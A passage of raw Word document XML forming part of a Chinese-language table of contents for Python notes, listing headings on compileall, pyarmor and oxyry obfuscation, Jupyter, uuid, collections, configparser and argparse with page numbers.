              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779891 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>455</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="457037FC" w14:textId="5632C9DB" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779892" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>compileall</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>编译：防止泄露源码</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>目前看来无法使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779892 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>455</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D20A4F8" w14:textId="128C0601" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779893" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>oxyry</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：混淆代码</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779893 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>457</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6865C9E8" w14:textId="0B03C93D" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779894" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>pyarmor</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：混淆、编译代码</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779894 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>457</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23FFC763" w14:textId="149CFA8E" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779895" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>jupyter</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779895 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>459</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2690EF57" w14:textId="4D76F6D5" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779896" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>jupyter notebook</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779896 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>459</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="213AB64C" w14:textId="1DD5A0C2" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779897" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>一获取配置文件路径或重写</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779897 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>460</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="64704558" w14:textId="3851C0F0" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779898" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>安装扩展</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779898 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>460</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4221229A" w14:textId="4D4C0ABE" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779899" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>uuid</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779899 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>460</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0C393B6D" w14:textId="18D1E84E" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779900" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>collections</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779900 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>461</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0AA97109" w14:textId="3B3E4A1E" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779901" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>defaultdict(lambda: None)</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：默认键值为空的字典</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779901 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>461</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="21620EBC" w14:textId="30E5E9D4" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779902" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">namedtuple: </w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>可命名的元组</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779902 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>461</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49DBF912" w14:textId="3CB8B9A7" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779903" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>configparser</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：读取</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ini</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>配置文件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779903 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>462</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="16EEF8EA" w14:textId="212F2E90" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779904" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>读文件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779904 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>462</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68CFE686" w14:textId="0385E47C" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779905" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>新增或者修改</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779905 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>463</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0ACB8165" w14:textId="6A39B509" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779906" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>argparse</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779906 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>464</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C2FA395" w14:textId="3632B696" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779907" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>指定传参参数</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779907 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>464</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0AA36532" w14:textId="44728828" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779908" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>指定传参参数类型</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779908 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>464</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="396DEF61" w14:textId="5F09314D" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
